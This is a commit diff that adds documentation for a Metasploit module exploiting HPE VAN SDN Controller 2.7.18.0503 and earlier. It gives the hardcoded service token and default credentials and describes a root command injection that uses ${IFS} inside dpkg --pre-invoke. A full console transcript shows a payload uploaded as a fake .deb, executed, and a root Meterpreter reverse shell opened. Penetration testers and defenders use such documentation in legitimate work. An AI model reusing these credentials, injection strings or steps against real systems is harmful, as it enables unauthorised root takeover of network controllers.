Add module doc
parent
41b0adad88
commit
12a0aaeaf1
|
@ -0,0 +1,85 @@
|
|||
## Intro
|
||||
|
||||
This module exploits a hardcoded service token or default credentials in
|
||||
HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.
|
||||
|
||||
A root command injection was discovered in the uninstall action's name
|
||||
parameter, obviating the need to use sudo for privilege escalation.
|
||||
|
||||
If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
|
||||
will be used for authentication. An additional login request will be
|
||||
sent.
|
||||
|
||||
## Setup
|
||||
|
||||
Follow <http://h22208.www2.hpe.com/eginfolib/networking/docs/sdn/sdnc2_6/5998-8473install/content/s_download_sw.html>.
|
||||
|
||||
Tested on 2.7.18.0503.
|
||||
|
||||
## Options
|
||||
|
||||
**TOKEN**
|
||||
|
||||
Set this to the service token. Defaults to `AuroraSdnToken37`.
|
||||
|
||||
**USERNAME**
|
||||
|
||||
Set this to the service username. Defaults to `sdn`.
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Set this to the service password. Defaults to `skyline`.
|
||||
|
||||
## Usage
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/hp_van_sdn_token
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set rhosts 192.168.56.102
|
||||
rhosts => 192.168.56.102
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set target Linux Dropper
|
||||
target => Linux Dropper
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Authenticating with service token AuroraSdnToken37
|
||||
[*] Uploading payload as fake .deb
|
||||
[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
|
||||
[*] Renaming payload and executing it
|
||||
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
|
||||
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
|
||||
[*] Sending stage (812100 bytes) to 192.168.56.102
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
|
||||
[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.56.102
|
||||
OS : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
Background session 1? [y/N]
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > set token ""
|
||||
token =>
|
||||
msf5 exploit(linux/http/hp_van_sdn_token) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Authenticating with creds sdn:skyline
|
||||
[+] Logged in with auth token 26d7b53a73a9455eae63c346321bfe31
|
||||
[*] Uploading payload as fake .deb
|
||||
[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
|
||||
[*] Renaming payload and executing it
|
||||
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
|
||||
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
|
||||
[*] Sending stage (812100 bytes) to 192.168.56.102
|
||||
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
|
||||
[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
|
||||
|
||||
meterpreter >
|
||||
```
|
Loading…
Reference in New Issue